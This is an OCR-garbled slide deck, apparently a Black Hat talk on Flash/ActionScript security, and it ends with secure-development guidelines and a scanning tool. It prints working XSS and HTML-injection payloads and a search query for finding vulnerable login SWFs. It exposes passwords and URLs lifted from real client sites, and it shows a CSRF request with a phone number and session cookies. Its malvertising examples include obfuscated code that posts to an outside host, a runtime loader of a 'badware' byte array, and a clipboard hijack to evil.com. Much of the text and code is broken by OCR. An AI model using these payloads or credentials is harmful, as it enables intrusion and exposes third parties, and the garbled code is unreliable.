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INTRODUCTION 
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Flash and Actionscript 

Flash 

- Over a decade old 

- Ten versions so far 

- Changes in security model 

Actionscript 

- Flash language 

- Three versions 

-AS 2.0 & AS 3.0 Differences 
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INFORMATION DISCLOSURE 
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Picture Perfect 
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kwave flash Object) - Mozilla Firefox 



larks Xools Help 




at ion - Earthquake Preparedness - Maintenance Standards - Combating Graf i Hi - Budgeting for Equipment - Life Cycf 




Client-Side Authentication 
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Behind the scenes 



on (release, releaseOutside, keyPress '<Enter>') { 
if (User eq 'ccfsa' and Password eq 'secure') { 
gotoAndPlay('userl'); 
} else { 
if (user eq 'user2' and password eq 'pass2') { 
gotoAndPlay('user2'); 
} else { 
if (user eq 'user3' and password eq 'pass3') { 
gotoAndPlay('user3'); 
} else { 
if (user eq 'user4' and password eq 'pass4') { 
gotoAndPlay(80); 
} else { 
if (user eq 'user5' and password eq 'pass5') { 
gotoAndPlay(70); 
}else{ ... 
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on (release, keyPn 

if (gbjogin == 

if (gb_passwo 

JevelO. login 

JevelO.goto 

getURL('http://wwv\ 
tml', "_self); 
} 



on (release, keyPress '<Enter>') { 
if (password eq 'Devlin778') { 

getURL( , http://www.thedesignfactor.com/client_pages/Seamus_Devli 

n/778.html\ "); 
} else { 



iter') { 

word == 'enter') { 

;sword == 'enter') { 



Out of approx. 150 Google results for the query 

filetype:swf inurhlogin OR inurhsecure OR inurhadmin 

23 swf applications revealed login credentials. 



~iT(password eq f (i-z update'}"!"" 

getURL('http://www.thedesignfactor.com/client_pages/Titanic_Quart 

er/771.html', "); 
} else { 
if (password eq '7990') { 



assword == 'pw4') { 



Password == 'pw5') { 



S3 . 



'dpgroupl2345') { 
gotoAndPI 
} else { 
if (usernam 
gotoAndP 
} else { 
if (usernar 
'pw5123') { 
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Who needs credentials 



bom/client_pages/Stevensons/783.html\ "); 



bm/client_pages/Titanic_Quarter/771.htmr, "); 



if (password eq 783-1') { 

getURL('http:/A 

} else { 

if (password eq 771-2 Update') { 

getU RL('http://www^^^^^fl 

} else { 

if (password eq 7990') { 

getURL('http://www.^^^^^^^^*om/client_pages/Titanic_Quarter/799.htmr, "); 

} else { 

if (password eq 7872') { 
getURL('http:/A 
.html', "); 

} else { 

if (password eq '8032') { 
getURL('http://wwl~ 



|com/client_pages/lnnovate_Lifting_Systems/787 



lcom/client_pages/Platform_Lifting_Solutions/803 



.html', "); 
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CROSS-DOMAIN 
COMMUNICATION 



d Black Hat Briefinas 







tst 



Security Model 



Sandboxing model 

- Sandboxes: logical security groupings that Flash Player uses to 
contain resources 

- Resources in the same security sandbox (local or network) can 
always access each other . 

- Resources in a remote sandbox can never access local 
resources 

- Exact domain match. Each of the following resides in a 
separate sandbox 

http://a.com 
http://www.a.com 
http://www.a-b. com 
https://www.a.com 
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a.com Sandbox 



b.com Sandbox 






i . 



©« — »@ ©< — »© 

~ ixi 




File a3 File a4 



• 




File b3 File b4 



Sandbox Model 
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Cross-domain communication 

► Cross-domain policy files 

- Types of policy files 

• Meta policy files 

• Master policy file 

• Socket policy files 

- Purpose of a policy file 
-Abusing policy file usage 
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:i Mozilla Firef ox 



File Edit View History Bookmarks Tools Help 



T O lBj I ^ |htlp://wwM 



# @n0nym0us's Channel at | 




. com/crossdomain . xml 



^ http://www.met..,ros^domain.xml k 



This XML file does not appear to have any style information associated with it. The document tree is 
shown below. 



— <cross-domaio-policy> 

<allow- ace ess from domain- '*"/> 
< c r o s s - d o m a m - po licy> 



Done 



* A 



crossdomain.xml 
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cross-site request 
Sforgery 
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■ 

■ I 

■ 

I 

9 

■ 

■ 
■ 
■ 



: @n4nvm0us r s Channel at 



File Edit View History Bookmarks Tools Help 



m M ~ C _Bj ^ |http://www 



# @n0nym0us's Channel at 




City 



State / 
Province 

Country or 

Region 

£ip / Postal 
Code 

Daytime 
Phone 

Cellular 
Phone 



atlanta 



Georgia 



j 



United States 



30313 
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| Make citv 



| Make sta - 
public 

| Make col 



Cancel 



it 



S 



\W A 



fa 








: 



private function load():void{ 
var request:URLRequest=new 
URLRequest("http://www^^^Me. com/index. php7 
request.method = URLRequestMethod.POST; 



geT"); 

var variables:URLVariables = new URLVariables(''phoneNumberw4^7703437070jJ) 
request.data = variables; ^^* ^^ 

try{ 

navigateToURL(request, "_self"); 
} catch (error: Error) { 

trace("Unable to load requested document."); 



■ 



Ise HTTP/1.1 



POST /index.php?inputTy^M 
Host: www.ti^^tt-com 

COOkie: dsavip=3316650156.20480.0000; PHPSESSID=a981d67f85ff4c296fa502a94331181d; 

User={"sc":3,"visitlD":"5b35d7d389c89d0510de02443e f2d5e6"," npUserLocations":[244],"npUserLanguages":[9]| 

npFamilyFilter , ^5; , LEID ,, :564; , LanglD , r , en^ ,, pve , ^92; , gl*BMIacafe48e954abal3ad2.32588888 ,, ) ,, ViewedChaJ 

nellDs , ^[ ,, 8256400^ ,, 9541350 ,, ]; , uulD , r , 2QW7dsEY4ulE9HcOQJgJLX2dUXJgy78h^ , ViewedltemlDs ,, :[ ,, 1834968 ,, j 

,, LastCatalogReference": ,m }; s_cc=true; s_sq=[[B]]; _qca=1222845967-58297858-51472404; 

qcb=527457021; TZOffset=240; md={ ,, senderName , V , @nOnymOus ,, ) ,, senderEmair , :"fakeadress@fraud.coiTi ,, };| 

ioneNumberWork^7703437070 
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lainOnymOuss Channel at 



Mozilla Firefox 



File Edit View History Bookmarks Tools Help 




©~ 



- C lBj Hi http://www 



I com/account/my _settings/ 



iPl Most Visited E3 @hp Employee Portal J Customize Links ] Windows Marketplc 

CSS T I J Forms T - Images w @ Information T ■ ) Miscellaneous w ^ Outiine * ^ Resize T , Tools 



Disable T <S Cookies 



"Georgia" 



Province 

Country op 

Region 

Zip / Postal 
Code 

Daytime 
Phone 

Cellular 
Phone 



United States 



30318 




Cancel 



Save Settings 



_iJ 



Done 
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CROSS-SITE SCRIPTING 
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XSS - Root causes 



Uninitialized Variables 

-Any uninitialized variable (_root.*, 
_global.*, JevelO.*) can be assigned 
values via query parameters. 

Injection points 

-getURL function 

- htmlText property 

- load* 
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getURL - URL parameter 

getURL(url [, window [, "variables"]]) 
Execute script code 

getURL(javascript:code, '_self') 
Example 



on(release) { 
getURLCJavascripfcalertCYXSSY)'); 

} 
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Done 



d Black Hat Briefinas 



1 Testflastt - Mozilla Firefox 




Jnlxl 


File Edit View History Bookmarks Tools Help 


flQP w G €b;. C\ |http://localhost/TestFlash/TestFlash.htnil 


W T El T Google 


>•' 







^ 



ra* 




getURL 



paramater 



getURL(url [, window [, "variables"]]) 

- variables A GET or POST method for sending variables. 
The GET method appends the variables to the end of the 
URL, and is used for small numbers of variables. 

Example 



getURL("javascript:void(0)", "_self", "GET"); 



http://host/XSS.swf?a=0:0;alert('XSS') 
javascript:void(0)?a=0:0;alert('XSS') 



■ ■ 
■ 
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|| ^TestFlash.swf ( a pphcatkMi/x-shockwave- flash Object) - Mozilla Firefojt 






-Inlxl 


File Edit View History Bookmarks Tools Help 


-fSjfr 

C9 C X ^ 


Q | http : //localhost/Testf lash/Testf lash . swf?a =0 : 0;aJertf XSS') 


ft - 


|C| T | Google 


,/ 











The page at http://localtwst says: 



XSS 



OK 



Done 
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HTML Injection 



Supported tags (From Adobe) 

- Anchor: <a href= , 7support/flash/ts/documents/url ,, > 

- Bold: <b> , Italic: <l> 

- Font: < font [color- '#xxxxxx"] [face- Type Face"] 
[size- Type Size"]> 

- Paragraph: <p [align= ,, left ,, | ,, right ,, | ,, center ,, ]> 

- Underline: <u> , Break: <br> 

- Image: <img src='7images/flash/dogs.jpg , 7> 

- List Item: <li> , Span: <span> 

- TextFormat: <textformat> 
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Anchor Tag 



<a href- javascript:code'> 

<a href='asfunction:function, arg> 

<a href='asfunction:System.Security.allowDomain, 
evilhost> 



this.createTextField("txtBranchAddress", this.getNextHighestDepth(), 10, 
10, 200, 200); 

txtBranchAddress.html = true; 

txtBranchAddress.htmlText = _root.branch + "\r\n" + 
branchAddresses[_root. branch] ; 



• http://host/contact.swf?branch=<ahref='javascript:alert("XSS")'> 
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i . 



Bookmarks Xools Help 



LU 



D http:, 



untac t s wf Pbranch = % 3Ca % ZOhref ='ja vasaipt: alert[% ZZXSS % ZZ) 1 % 3E 



undefined 



The page at http://localtwst says: 



& 



xss 



OK 
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Image Tag 



this.createTextField("txtBranchAddress", this.getNextHighestDepth(), 10, 
10, 200, 200); 

txtBranchAddress.html = true; 

txtBranchAddress.htmlText = _root.branch + "\r\n" + 

branchAddresses[_root. branch] ; 



Exploits 

- <img src- javascript:code//.jpg'> 
-<img src-asfunction:function, arg .jpg 7 > 

http://host/contact.swf?branch=<img 

src- asfunction:getURL, javascript:alert("XSS") .jpg'> 
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Sensitive APIs 



loadVariables, loadVariablesNum, 
MovieClip.loadVariables, Load Vars. load, 
LoadVars.sendAndLoad 

XML.Ioad, XML.send And Load 

URLLoader.load, URLStream.load 

LocalConnection 

Externallnterface.addCallback 

SharedObject.getLocal, SharedObject.getRemote 
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ARE WE CRYING WOLF??? 
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Fact Check 



ClickTag 

- getURL(clickTag, l _self) 

- Of 200 results for Google query 'filetype:swf 
inurlxlickTag, 120 were found to be vulnerable to 
XSS. 

- Only 18 (9%) used validation 
XSS in automatically generated swfs 

- SWFs generated by authoring tools - Adobe 
Dreamweaver, Adobe Connect, Macromedia 
Breeze, Techsmith Camtasia, Autodemo, and 
InfoSoft FusionChart contained XSS vulnerabilities 
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Widespread Incidents 

Adobe Dreamweaver 

- skinName parameter: load arbitrary URLs 

Adobe Acrobat Connect/Macromedia Dreamweaver 

- baseURL parameter of controller main.swf: load arbitrary URLs 

Infosoft FusionCharts 

- dataURL: html injection into textarea 

Techsmith Camtasia 

- csPreloader: load arbitrary flash file 



Google queries for these parameters result in over 3000 
hits 
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DATA INJECTION 
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Flash Video 



Metadata 



- length/duration of video, frame rate, video/audio 
data rates 

onMetaData(NetStream.onMetaData handler) 

triggered after a call to the NetStream.playQ method 
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Vulnerable Code 



this.createTextFieldC'txtMetadata", this.getNextHighestDepth(), 10, 
! 10, 500, 500); 

txtMetadata.html = true; 

var nc:NetConnection = new NetConnection(); 

nc.connect(null); 

var ns:NetStream = new NetStream(nc); 

ns.onMetaData = function(infoObject:Object) { 

| for (var propName:String in infoObject) { 

! txtMetadata.htmlText += propName + " = " + 
[ infoObject[propName]; 



}}; 

ns.play("http://localhost/TestFlash/water.flv"): 
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■ - ' C:\WIHDQWS\5V5tem32\cmdLexe 



C:\Documents and Settings\]"agdale\Desktop\TestFlashAppsRW\flvtool 2-1. 0.6>f lvtool2.exe -U -videodatarate:" 
<a h r ef= r javasc rip t: alert (123) r >Click here to calculate the videodatarate</a>" C:\Inetpub\wwwroot\TestFla 
shWter.flva 



^1 
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C\WmDOWS\svstein32\ciniLexe 



I C : \Documents and Setti ngs\jagdale\Desktop\TestFlashAppsRW\flvtoo1 2-1. 0.6>f lvtoo12.exe -P C:\Inetpub\wwwn 
I ot\TestFlash\water.f~lv 

-C:/Inetpub/wwwroot/TestFlash/water.f~lv: 
audiodatarate: 
cuePoints: 
has Key frames: true 
hasVideo: true 
frame rate: 14 
canSeekToEnd: true 
stereo: 

lasttimestamp: 7.347 
datasize: 387851 
videocodecid: 4 
audi os ample rate: 
audiosize: 
audiosamplesize: 
videosize: 386977 
audiodelay: 
hasAudio: false 
filesize: 388312 
height: 215 

lastkeyframetimestamp: 7.347 

metadatacreator: inlet media FLVToo12 vl.0.6 - http://www.in1et-media.de/f1vtoo12 
metadatadate: Wed Oct 8 09:18:34 GMT-0400 2008 
duration: 7.414 
vidfioddLai dlu: <a I 



audiocodecid: 
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V TestFlasttswf fa pplication/x-shQcJcjvave- flash Object} - Mozilla Hrefox 



Jnjxj 



File Edit View History Bookmarks Tools Help 



<^1 - L | D httpi/ylocalhQst/restFlashyTestFlash.swf 



T ^ |G| T Google 



H 



width = 320 
hasCuePoints = false 

c_ ideodatarate = Click here to calculate the videodataiate 

audi o c o d e r -iH [^liji^t Object] 

keyframes = [object Object] 

hasMetadata = tine 

filesize = 388312 

height = 215 

1 as tkevframe times tamp = 7.347 

metadatacreator = inlet media FL 1 ' 

metadatadate = Wed Oct 3 09:18:" 

videosize = 386977 

audiodelay = 

has Audio = false 

audiosize = Q 

audiosamplesize = [object Object]" 

1 as ttime stamp = 7.347 

datasize = 387851 

videocodecid = 4 

audi os ampler ate = [object Object] 

framerate =14 

canSeekToEnd = true 

stereo = [object Object] 



ih 



123 



OK 



*J 



H2 
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FLASH MALWARE 
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Malvertisement 



Jul 2006 

- MySpace ad injects malware into 1.07 million computers 
Feb 2007 

- Malware found in Windows Live Messenger ads 
Sep 2007 

- Yahoo feeds Trojan-laced ads to MySpace and PhotoBucket users 
(also affected TheSun.co.uk, Bebo.com and UltimateGuitar.com) 

Nov 2007 

- Whitepages online and Bigpond ads 'hijack' users 
Dec 2007 

- Hackers Use Banner Ads on Major Sites to Hijack Your PC (The 
Economist, MLB.com, Canada.com etc), redirect function 
encrypted. 

- Malware bandits go looking for goals on ESPN's Soccernet.com 
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Malvertisement 



Jan 2008 

- Rogue ads infiltrate Expedia and Rhapsody 

- ITV Website Forces Scareware Package Through Banner Ads 
Apr 2008 

- Yahoo! pimping malware from banner ads 

- Fake FedEx Advertisement 
Aug 2008 

- 'Malvertisement' epidemic visits house of Newsweek.com 

- Clipboard Hijack 

• System. setClipboard("http://www.evil. com"); 

• The System. setClipboard() method allows a SWF file to replace 
the contents of the clipboard with a plain-text string of 
characters. This poses no security risk [Adobe]. 
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Malvertisement 



Bypassing Filters/Prevent Decompilation 

- Obfuscation 

- Runtime Instantiation 

• var instanceName = _global[<className>] (AS 2.0) 

• var name:Class = getDefinitionByName(<className>) 
as Class (AS 3.0) 

var f=String.fromCharCode 

var a=f(76); a+=f(lll); a+=f(97); a+=f(100); a+=f(86); a+=f(97); a+=f(114); 

a+=f(115); 

(new _global[a]()).send( l http://www.sift.com.au', '_parent', 'post'); 

(new _global['LoadVars']()).send( l http://www.sift. com.au', '_parent', "post 1 }; 



! 
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Obfuscation 



Functions 



var f=String.fromCharCode 

var a=f(103); a+=f(101); a+=f(116); a+=f(85); a+=f(82); a+=f(76); 

_root[a]('http://www.sift.com.au l , '_parent', 'post'); 



■ 



getURL( , http://www.sift.com.au , ) '_parent', 'post'); 



Loading code at runtime 



loader=new Loader(); 

configureListeners(loader.contentLoaderlnfo); var ba:ByteArray=new ByteArray(); 

var badware:Array= 

[67,87,83,7,195,3,0,0,120,218,124,83,203,110,19,49,20,189,227,73,51,78,67,83,154,2 

0,166,145,42,145,93,137,64,176,200,10,197,111,0,71,6,180,201,26,91,33,15,216,6, ... 

181,186,125,16,51,47,221,254,62,234,103,81,111,71,62,24,123,243,150,44,173,76,137 

,178,196,28,218,112,138,211,159,0,0,0,255,255,3,0,4,45,181,29]; 

for(var i:int=0;i<badware.length;i++) 

ba.writeByte(badware[i]) ; 
loader, load Bytes(ba); 
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DEFEATING DECOMPILERS 
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Playing with the bytecode 



push 'b' 
labell: 
push 'a', 3 
setVariable 
branch Iabel2 
branch labell 
Iabel2: 



push 'b' labell: push 'a', 3 setVariable branch Iabel2 

branch labell 

Iabel2: 
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TOOLS 
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Tools 



Decompiler/Disassembler [Free/Open Source] 

- Flare: Command line ActionScript decompiler 

- Flasm: Command line assembler/disassembler 

- erlswf: Erlang SWF file analysis toolkit 

- SWF Decompiler. SWF decompiler 

- Sothink SWF Decompiler: Commercial program to 
build FLA files from SWF (AS 3.0) 

- Action Script Viewer: Feature rich SWF decompiler 

- Flash Decompiler Trillix: SWF to FLA converter and 
decompiler (AS 3.0) 
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Tools 



Obfuscation 



- SWF Encrypt: Encrypts Flash SWF files 

- SWC Encrypt: Encrypts Flash Component SWC 
files 

- OBFU: Flash ActionScript 2 bytecode obfuscator 

- SWF Protect: Flash ActionScript bytecode 
obfuscator 

- DCoM SWF Protector: Flash Obfuscator 
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SWFSCAN 
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What is SWFScan? 

FLASH SECURITY SCANNING TOOL 

(Designed by HP Web Security Research Group) 

Analyzes Flash applications and report security 
vulnerabilities detected. 

Flash Developer Community Education 

- Make developers aware of their coding pitfalls 

Supports ALL versions of Flash 
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Features 



Decompiles SWF byte code and generates ActionScript 
source code 

Performs Source-Sink analysis to understand the data 
flow 

Checks for known security issues 

- Information disclosure 

- Cross-Site Scripting 

- Cross-Domain Privilege Escalation 

Reports vulnerabilities found and highlights the source 
code block causing the vulnerability 
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DEMO 
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SECURE FLASH 
^DEVELOPMENT 
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Guidelines 



• VALIDATE VALIDATE VALIDATE!!! 

• Avoid storing sensitive information in the swf application 

• Use SSL whenever necessary 

!• Secure cross-domain communications 

| - Use specific domains in crossdomain.xml 

! - Use sub-directory crossdomain.xml 

i - Limit allowDomainQ settings to specific domains 

• Use proper escaping when writing to htmlText 

• Review the list of sensitive API's 
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QUESTIONS? 



prajakta.jagdale@hp.com 
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